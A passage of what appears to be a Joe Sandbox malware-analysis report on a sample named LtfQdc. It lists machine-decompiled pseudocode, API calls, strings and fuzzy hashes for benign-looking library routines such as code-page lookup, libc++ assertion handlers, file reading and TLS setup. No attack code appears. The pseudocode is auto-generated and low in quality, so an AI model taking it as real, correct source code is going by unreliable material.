												_t113 = _t113 + 0x100;
												if(_t119 != 0xfde9) {
													E00D226B9(_t95, _t119, _t113, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t70 = E00D1946F(_t95, _t113, 0x10, L"utf8");
													_t125 = _t125 + 0x10;
													if(_t70 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x00d19935
0x00d19936
0x00d19938
0x00d1993a
0x00d1993d
0x00d19944
0x00d19946
0x00d19949
0x00d19949
0x00d1994c
0x00d1994c
0x00d19952
0x00d19955
0x00d19958
0x00d19958
0x00d1995b
0x00d1995e
0x00d19960
0x00d19966
0x00d19968
0x00d1996d
0x00d1996f
0x00d19970
0x00d19972
0x00d19977
0x00d1997c
0x00d1997e
0x00d19981
0x00d19981
0x00d19983
0x00d19987
0x00d199d0
0x00000000
0x00d19989
0x00d1998e
0x00d19997
0x00d19990
0x00d19990
0x00d19990
0x00d199a2
0x00d199a4
0x00d199a5
0x00d199a7
0x00d199ac
0x00d199b1
0x00d199b6
0x00d199bc
0x00d199c0
0x00d199c9
0x00d199c2
0x00d199c2
0x00d199c2
0x00d199d5
0x00d199d5
0x00d199b6
0x00d199a2
0x00d199db
0x00d19b17
0x00d19b17
0x00d19b17
0x00000000
0x00d199e1
0x00d199e1
0x00d199ea
0x00d199fb
0x00d199f1
0x00d199f1
0x00d199f1
0x00d19a02
0x00d19a06
0x00000000
0x00d19a2a
0x00d19a2a
0x00d19a2f
0x00d19a31
0x00d19a31
0x00d19a33
0x00d19a38
0x00d19b12
0x00d19b14
0x00d19b19
0x00d19b1d
0x00d19a3e
0x00d19a3e
0x00d19a41
0x00d19a41
0x00d19a49
0x00d19a4c
0x00d19a4f
0x00d19a4f
0x00d19a52
0x00d19a55
0x00d19a5d
0x00d19a62
0x00d19a69
0x00d19a6e
0x00d19a73
0x00d19b1e
0x00d19b20
0x00d19b21
0x00d19b22
0x00d19b23
0x00d19b24
0x00d19b25
0x00d19b2a
0x00d19b30
0x00d19b31
0x00d19b32
0x00d19b37
0x00d19b38
0x00d19b39
0x00d19b3b
0x00d19b3d
0x00d19b3f
0x00d19b40
0x00d19b40
0x00d19b42
0x00000000
0x00000000
0x00d19b47
0x00d19b4f
0x00d19b54
0x00d19b64
0x00d19b68
0x00d19b6a
0x00d19b7e
0x00d19b85
0x00d19b80
0x00d19b80
0x00d19b80
0x00d19b6c
0x00d19b7a
0x00d19b7a
0x00d19b88
0x00d19b8a
0x00000000
0x00000000
0x00000000
0x00d19b8a
0x00d19b8c
0x00d19b8f
0x00d19b92
0x00d19b92
0x00d19b97
0x00d19a79
0x00d19a89
0x00000000
0x00d19a8f
0x00d19a91
0x00d19a91
0x00d19a9d
0x00d19aab
0x00000000
0x00d19aad
0x00d19aad
0x00d19ab0
0x00d19ab6
0x00d19ab9
0x00d19ac9
0x00d19ace
0x00d19adc
0x00000000
0x00000000
0x00000000
0x00000000
0x00d19abb
0x00d19abb
0x00d19abe
0x00d19ac4
0x00d19ac7
0x00d19ade
0x00d19ade
0x00d19aea
0x00d19b0a
0x00000000
0x00d19aec
0x00d19aec
0x00d19af6
0x00d19afb
0x00d19b00
0x00000000
0x00d19b02
0x00000000
0x00d19b02
0x00d19b00
0x00000000
0x00000000
0x00000000
0x00d19ac7
0x00d19ab9
0x00d19aab
0x00d19a89
0x00d19a73
0x00d19a38
0x00d19a06

APIs

Part of subcall function 00D155BA: GetLastError.KERNEL32(?,00000008,00D12B3A), ref: 00D155BE
Part of subcall function 00D155BA: SetLastError.KERNEL32(00000000,?), ref: 00D15660

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00D0B2D6,?,?,?,00000055,?,-00000050,?,?,?), ref: 00D199F1
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00D0B2D6,?,?,?,00000055,?,-00000050,?,?), ref: 00D19A1C
_wcschr.LIBVCRUNTIME ref: 00D19AB0
_wcschr.LIBVCRUNTIME ref: 00D19ABE

Strings

utf8, xrefs: 00D19AEE

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ErrorLast_wcschr$CodePageValid
String ID: utf8
API String ID: 650444998-905460609
Opcode ID: d33a11fe4f6b2a9ca29d406f1b9ade5b1baf29d43b4f97921b92ed69ccfeafa8
Instruction ID: 3512021a03fdf3e5f459cd47944fc77e420664b20eac56e46fef921c4a71302d
Opcode Fuzzy Hash: d33a11fe4f6b2a9ca29d406f1b9ade5b1baf29d43b4f97921b92ed69ccfeafa8
Instruction Fuzzy Hash: 5551E171A04305BADB24AB75BCF2BE6F2A8EF44740F184429F5459B185FEB0EDC08671

Uniqueness

Uniqueness Score: -1.00%

Function 00CDE9C0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00CDE9C0(intOrPtr __ecx, void* __fp0, intOrPtr _a4) {
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr* _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				signed int _t49;
				intOrPtr* _t50;
				intOrPtr _t55;
				intOrPtr _t59;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t84;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t90;
				intOrPtr _t91;
				intOrPtr* _t96;
				signed int _t99;
				intOrPtr* _t101;
				signed int _t116;
				signed int* _t118;
				intOrPtr* _t119;
				intOrPtr _t120;
				intOrPtr* _t122;
				intOrPtr _t124;
				signed int _t125;
				signed int _t126;
				void* _t128;
				void* _t129;
				void* _t141;

				_t141 = __fp0;
				_t129 = _t128 - 0x10;
				_t84 = __ecx;
				_t124 = _a4;
				_t47 =  *0xd40014; // 0xfbddd969
				_v20 = _t47 ^ _t126;
				_t49 =  *((intOrPtr*)(__ecx + 4));
				_v28 = _t49;
				if(_t49 == 0) {
					_t50 = 0;
					__eflags = 0;
				} else {
					_t50 = E00D131A0(_t49);
					_t129 = _t129 + 4;
				}
				_v24 = _t50;
				_t118 =  &_v28;
				L00CC4ED0(_t118);
				_v28 =  *((intOrPtr*)(_t84 + 8));
				L00CC4CF0(_t124, _t118, _t118);
				_t96 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0xc)) + 0x10));
				_t55 =  *_t96;
				_v32 = _t84;
				_t86 =  *((intOrPtr*)(_t96 + 4)) - _t55;
				_t99 = (_t86 >> 2) - 1;
				_t116 = 0xffffffff;
				if(_t99 < 2) {
					L6:
					_v28 = _t116;
					L00CC4CF0(_t124, _t118, _t118);
					_t101 =  *((intOrPtr*)( *((intOrPtr*)(_v32 + 0xc)) + 0x10));
					_t59 =  *_t101;
					_t116 =  *((intOrPtr*)(_t101 + 4)) - _t59;
					_t99 = _t116 >> 2;
					_t86 = 0xffffffff;
					if(_t99 - 1 < 2) {
						L9:
						_v28 = _t86;
						L00CC4CF0(_t124, _t118, _t118);
						_t88 = _v32;
						_v28 = E00CDE700(_t88);
						L00CC4CF0(_t124, _t118, _t118);
						_v28 =  *( *((intOrPtr*)( *((intOrPtr*)(_t88 + 0xc)) + 0x10)) + 0xc);
						return E00CFE643(L00CC4CF0(_t124, _t118, _t118), _t88, _v20 ^ _t126, _t116, _t118, _t124);
					} else {
						if(_t116 <= 4) {
							goto L10;
						} else {
							_t86 =  *(_t59 + _t99 * 4 - 8);
							goto L9;
						}
					}
				} else {
					if(_t86 <= 4) {
						L10:
						_push("vector[] index out of bounds");
						_push("__n < size()");
						_push(0x5bb);
						_push("..\\..\\buildtools\\third_party\\libc++\\trunk\\include\\vector");
						_t68 = L00C96D4C(_t86, _t99, _t116, _t141, "%s:%d: assertion %s failed: %s");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t126);
						_push(_t86);
						_push(_t118);
						_push(_t124);
						_push(_t68);
						_t125 = _t99;
						_t119 = _v44;
						E00CDF760(_t99, _t119);
						 *_t125 = 0xd2f594;
						 *((intOrPtr*)(_t125 + 0xc)) = 0;
						 *((intOrPtr*)(_t125 + 0x10)) = 0;
						__eflags = _t119;
						if(_t119 == 0) {
							_t70 = 0;
							__eflags = 0;
						} else {
							_t70 = E00D131A0(_t119);
							_t129 = _t129 + 4;
						}
						_v24 = E00CE5260(_t86, __eflags, _t119, _t70);
						_push(0x20);
						_t120 = L00CFDBBC();
						_push(_a4);
						E00CF49A0(_t116, _t72, _t116, _t120, _t125, _v24, _t116);
						_t90 =  *((intOrPtr*)(_t125 + 0xc));
						 *((intOrPtr*)(_t125 + 0xc)) = _t120;
						__eflags = _t90;
						if(_t90 != 0) {
							 *0xd57000();
							 *((intOrPtr*)( *((intOrPtr*)( *_t90))))(1);
							_t120 =  *((intOrPtr*)(_t125 + 0xc));
						}
						_v24 =  *((intOrPtr*)( *((intOrPtr*)(_t120 + 8))));
						_push(0x20);
						_t91 = L00CFDBBC();
						_push(_a4);
						E00CF49A0(_t91, _t75, _t116,  *((intOrPtr*)( *((intOrPtr*)(_t120 + 8)) + 4)), _t125, _v24,  *((intOrPtr*)( *((intOrPtr*)(_t120 + 8)) + 4)));
						_t122 =  *((intOrPtr*)(_t125 + 0x10));
						 *((intOrPtr*)(_t125 + 0x10)) = _t91;
						__eflags = _t122;
						if(_t122 != 0) {
							 *0xd57000();
							 *((intOrPtr*)( *((intOrPtr*)( *_t122))))(1);
						}
						return _t125;
					} else {
						_t116 =  *(_t55 + 4);
						goto L6;
					}
				}
			}

0x00cde9c0
0x00cde9c6
0x00cde9c9
0x00cde9cb
0x00cde9ce
0x00cde9d5
0x00cde9d8
0x00cde9db
0x00cde9e0
0x00cde9ed
0x00cde9ed
0x00cde9e2
0x00cde9e3
0x00cde9e8
0x00cde9e8
0x00cde9ef
0x00cde9f2
0x00cde9f8
0x00cdea00
0x00cdea06
0x00cdea0e
0x00cdea11
0x00cdea13
0x00cdea19
0x00cdea20
0x00cdea21
0x00cdea29
0x00cdea37
0x00cdea37
0x00cdea3d
0x00cdea48
0x00cdea4b
0x00cdea50
0x00cdea54
0x00cdea5d
0x00cdea62
0x00cdea6d
0x00cdea6d
0x00cdea73
0x00cdea78
0x00cdea82
0x00cdea88
0x00cdea96
0x00cdeab2
0x00cdea64
0x00cdea67
0x00000000
0x00cdea69
0x00cdea69
0x00000000
0x00cdea69
0x00cdea67
0x00cdea2b
0x00cdea2e
0x00cdeab5
0x00cdeab5
0x00cdeaba
0x00cdeabf
0x00cdeac4
0x00cdeace
0x00cdead3
0x00cdead4
0x00cdead5
0x00cdead6
0x00cdead7
0x00cdead8
0x00cdead9
0x00cdeada
0x00cdeadb
0x00cdeadc
0x00cdeadd
0x00cdeade
0x00cdeadf
0x00cdeae0
0x00cdeae3
0x00cdeae4
0x00cdeae5
0x00cdeae6
0x00cdeae7
0x00cdeae9
0x00cdeaed
0x00cdeaf2
0x00cdeaf8
0x00cdeaff
0x00cdeb06
0x00cdeb08
0x00cdeb15
0x00cdeb15
0x00cdeb0a
0x00cdeb0b
0x00cdeb10
0x00cdeb10
0x00cdeb21
0x00cdeb26
0x00cdeb30
0x00cdeb34
0x00cdeb3b
0x00cdeb40
0x00cdeb43
0x00cdeb46
0x00cdeb48
0x00cdeb50
0x00cdeb5a
0x00cdeb5c
0x00cdeb5c
0x00cdeb64
0x00cdeb6a
0x00cdeb74
0x00cdeb78
0x00cdeb7f
0x00cdeb84
0x00cdeb87
0x00cdeb8a
0x00cdeb8c
0x00cdeb94
0x00cdeb9e
0x00cdeb9e
0x00cdeba9
0x00cdea34
0x00cdea34
0x00000000
0x00cdea34
0x00cdea2e

APIs

_strlen.LIBCMT ref: 00CDE9E3

Strings

%s:%d: assertion %s failed: %s, xrefs: 00CDEAC9
vector[] index out of bounds, xrefs: 00CDEAB5
__n < size(), xrefs: 00CDEABA
..\..\buildtools\third_party\libc++\trunk\include\vector, xrefs: 00CDEAC4

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: _strlen
String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\vector$__n < size()$vector[] index out of bounds
API String ID: 4218353326-797005249
Opcode ID: ab88f0def8fae2e179b3052ccc7484921565fc6024477db729011db15a875cec
Instruction ID: 55b9c392b152b1adeec17ca7299b0c47a4bd429cfecbbad7e937f8a27e21603a
Opcode Fuzzy Hash: ab88f0def8fae2e179b3052ccc7484921565fc6024477db729011db15a875cec
Instruction Fuzzy Hash: 50318374B002055F8B14EF69D8D6D7FBBB1EF49720710856EEE199F392CA31A9019BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00CC08A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 79
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00CC08A0(void** __ecx, void* __eflags, void* __fp0, void* _a4, long _a8) {
				void* _v16;
				signed int _v24;
				char _v96;
				signed int _v108;
				struct _OVERLAPPED* _v112;
				long _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				long _t28;
				signed int _t32;
				void* _t33;
				void* _t43;
				long _t44;
				void** _t45;
				signed int _t46;
				void* _t52;

				_t58 = __fp0;
				_t52 = __eflags;
				_t45 = __ecx;
				_t44 = _a8;
				_t18 =  *0xd40014; // 0xfbddd969
				_v24 = _t18 ^ _t46;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0x50], xmm0");
				asm("movdqa [esp+0x40], xmm0");
				asm("movdqa [esp+0x30], xmm0");
				asm("movdqa [esp+0x20], xmm0");
				_t31 =  &_v112;
				L00CC4C80( &_v112, "ReadAtCurrentPos", "..\\..\\base\\files\\file_win.cc", 0x5b);
				L00CC9DD0( &_v112,  &_v96, _t43, _t52, __fp0, _t31, 0);
				if(_t44 < 0) {
					_t32 = 0xffffffff;
				} else {
					_t33 = _a4;
					_v108 = 0xffffffff;
					_v112 = 0;
					if(E00CC4AA0() != 0) {
						L00CC4BB0( &_v112, __fp0, "File::ReadAtCurrentPos", _t45, _t44, 0);
					}
					_v116 = 0xffffffff;
					if(ReadFile( *_t45, _t33, _t44,  &_v116, 0) == 0) {
						_t28 = GetLastError();
						__eflags = _t28 - 0x26;
						_t13 = _t28 != 0x26;
						__eflags = _t13;
						_t32 =  ~(0 | _t13);
					} else {
						_t32 = _v116;
						if(_t32 < 0) {
							asm("int3");
							_t32 = 0;
						}
					}
					L00CC4B40( &_v112);
				}
				E00CFE643(L00CC9E30( &_v96, _t43, _t58), _t32, _v24 ^ _t46, _t43, _t44, _t45);
				return _t32;
			}

0x00cc08a0
0x00cc08a0
0x00cc08ac
0x00cc08ae
0x00cc08b1
0x00cc08b8
0x00cc08bc
0x00cc08c0
0x00cc08c6
0x00cc08cc
0x00cc08d2
0x00cc08d8
0x00cc08e9
0x00cc08f8
0x00cc08ff
0x00cc0959
0x00cc0901
0x00cc0901
0x00cc0904
0x00cc090c
0x00cc091b
0x00cc092a
0x00cc092a
0x00cc092f
0x00cc094a
0x00cc0960
0x00cc0968
0x00cc096b
0x00cc096b
0x00cc096e
0x00cc094c
0x00cc094c
0x00cc0952
0x00cc0954
0x00cc0955
0x00cc0955
0x00cc0952
0x00cc0974
0x00cc0974
0x00cc0988
0x00cc0996

APIs

ReadFile.KERNEL32(?,00000000,00CC8C83,FFFFFFFF,00000000), ref: 00CC0942
GetLastError.KERNEL32(?,00000000,00CC8C83,FFFFFFFF,00000000), ref: 00CC0960

Strings

..\..\base\files\file_win.cc, xrefs: 00CC08DE
ReadAtCurrentPos, xrefs: 00CC08E3
File::ReadAtCurrentPos, xrefs: 00CC0925

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: ..\..\base\files\file_win.cc$File::ReadAtCurrentPos$ReadAtCurrentPos
API String ID: 1948546556-1927398383
Opcode ID: fa09265cffbd6a0ea93022ee2cd2bfbc839406ef2b3e6c15d4d0697494e2f382
Instruction ID: d1152bb2d5ed1ca3b18fae2ff3c7c11979e899a2e7cf85b604fce015531ebe4e
Opcode Fuzzy Hash: fa09265cffbd6a0ea93022ee2cd2bfbc839406ef2b3e6c15d4d0697494e2f382
Instruction Fuzzy Hash: 1721D531504344ABD310DF54CC91F6BB7A4BBC8360F104B1DF6E1562D2EB709604C662

Uniqueness

Uniqueness Score: -1.00%

Function 00CB513A Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00CB513A(void* __ebx, intOrPtr* __ecx, void* __fp0, char _a4) {
				intOrPtr _v24;
				void* __edi;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t22;
				char _t23;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t28;

				_t34 = __fp0;
				_t16 = __ebx;
				_t23 = _a4;
				if(_t23 == 0) {
					_push("string::append received nullptr");
					_push("__s != nullptr");
					_push(0xb23);
					_push("..\\..\\buildtools\\third_party\\libc++\\trunk\\include\\string");
					L00C96D4C(__ebx, __ecx, _t22, __fp0, "%s:%d: assertion %s failed: %s");
					_push(_t23);
					_t27 = __ecx;
					_t24 = _v24;
					if( *((char*)(__ecx + 0xb)) < 0) {
						_t10 =  *((intOrPtr*)(__ecx + 4));
					} else {
						_t10 = L00C91E10(__ecx, __fp0);
					}
					if(_t10 >= _t24) {
						if( *((char*)(_t27 + 0xb)) < 0) {
							_t11 =  *_t27;
							 *((intOrPtr*)(_t27 + 4)) = _t24;
							_t27 = _t11;
						} else {
							_t11 = E00C9A150(_t16, _t27, _t24, _t34, _t24);
						}
						 *((char*)(_t27 + _t24)) = 0;
						return _t11;
					} else {
						return E00CB5026(_t27, _t34, _t24 - _t10, _a4);
					}
				}
				_t28 = __ecx;
				return L00CB4B30(__ebx, _t28, __fp0, _t23, E00D131A0(_t23));
			}

0x00cb513a
0x00cb513a
0x00cb513f
0x00cb5144
0x00cb5160
0x00cb5165
0x00cb516a
0x00cb516f
0x00cb5179
0x00cb5181
0x00cb5183
0x00cb5185
0x00cb518c
0x00cb5197
0x00cb518e
0x00cb5190
0x00cb5190
0x00cb519c
0x00cb51b3
0x00cb51bf
0x00cb51c1
0x00cb51c4
0x00cb51b5
0x00cb51b8
0x00cb51b8
0x00cb51c6
0x00000000
0x00cb519e
0x00000000
0x00cb51a8
0x00cb519c
0x00cb5146
0x00cb515d

APIs

_strlen.LIBCMT ref: 00CB5149

Strings

%s:%d: assertion %s failed: %s, xrefs: 00CB5174
string::append received nullptr, xrefs: 00CB5160
..\..\buildtools\third_party\libc++\trunk\include\string, xrefs: 00CB516F
__s != nullptr, xrefs: 00CB5165

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: _strlen
String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\string$__s != nullptr$string::append received nullptr
API String ID: 4218353326-424192179
Opcode ID: 0e2ef81879a017885340fcbdd5f5f2251bafdde9c6a6214689a7c51d46a8fd6e
Instruction ID: 4d206ae0cb82dc50c7859fe6e65a27bd17d20d56265372af2fc1e6293e23d2c5
Opcode Fuzzy Hash: 0e2ef81879a017885340fcbdd5f5f2251bafdde9c6a6214689a7c51d46a8fd6e
Instruction Fuzzy Hash: 1DF028633046643A56116119BC06FBF7E6DCBD1F74F04403AF80496182C9A19E4652F2

Uniqueness

Uniqueness Score: -1.00%

Function 00D0A744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E00D0A744(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0xd40014; // 0xfbddd969
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], E00D2515E, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0xd57000(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}

0x00d0a759
0x00d0a764
0x00d0a76a
0x00d0a76e
0x00d0a779
0x00d0a781
0x00d0a78b
0x00d0a791
0x00d0a795
0x00d0a79c
0x00d0a7a2
0x00d0a7a2
0x00d0a795
0x00d0a7a8
0x00d0a7ad
0x00d0a7ad
0x00d0a7b6
0x00d0a7c0

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FBDDD969,00000000,?,00000000,00D2515E,000000FF,?,00D0A80E,00C922C9,?,00D0A8AA,?), ref: 00D0A779
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D0A78B
FreeLibrary.KERNEL32(00000000,?,00000000,00D2515E,000000FF,?,00D0A80E,00C922C9,?,00D0A8AA,?), ref: 00D0A7AD

Strings

mscoree.dll, xrefs: 00D0A772
CorExitProcess, xrefs: 00D0A783

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 1fc05473423e9bbaeaf01a5f9f196d21a239c35d5ab62b785c1f7fd5d64c0016
Instruction ID: 06ab1c8ae712ae1f682e39c9c0750b7a5cb2b0d795733429e6a63f998e3099d9
Opcode Fuzzy Hash: 1fc05473423e9bbaeaf01a5f9f196d21a239c35d5ab62b785c1f7fd5d64c0016
Instruction Fuzzy Hash: 4F01A231900B29EFDB118F54DC45FAEBBB8FB44B25F044126E911E27D0DBB59904CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CFC080 Relevance: 7.6, APIs: 5, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

InitOnceExecuteOnce.KERNEL32(00D561B0,00CFC060,00CFC1C0,00000000), ref: 00CFC0B7
TlsGetValue.KERNEL32 ref: 00CFC0D8
AcquireSRWLockExclusive.KERNEL32(00D561BC), ref: 00CFC0ED
ReleaseSRWLockExclusive.KERNEL32(00D561BC), ref: 00CFC11C
TlsAlloc.KERNEL32 ref: 00CFC1C3

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLockOnce$AcquireAllocExecuteInitReleaseValue
String ID:
API String ID: 655554649-0
Opcode ID: 4c3fd4ea4fb5de1b2b79035e37486478eec6eb16af8637cb72f4d8258333de9b
Instruction ID: 38aea06aa40b59c9a53bffea9a258f178bbc10a0d30beb77f7b2cf0818b5fc62
Opcode Fuzzy Hash: 4c3fd4ea4fb5de1b2b79035e37486478eec6eb16af8637cb72f4d8258333de9b
Instruction Fuzzy Hash: BC31B975A0030C8BDB44DF64ED85A7E77B4AB44722B54402DEE16D33A2EB31A9148B72

Uniqueness

Uniqueness Score: -1.00%

Function 00CBC360 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00CBC360(long __ecx, char* __edx, void* __fp0) {
				signed int _v20;
				signed int _v1033;
				signed int _v1040;
				long _v1044;
				intOrPtr _v1048;
				char _v1052;
				signed int _v1053;
				signed int _v1060;
				char _v1064;
				signed int _v1065;
				long _v1068;
				signed int _v1072;
				char _v1076;
				char _v1080;
				long _v1084;
				CHAR* _v1088;
				intOrPtr _v1092;
				signed int _v1096;
				intOrPtr _v1100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t139;
				intOrPtr* _t144;
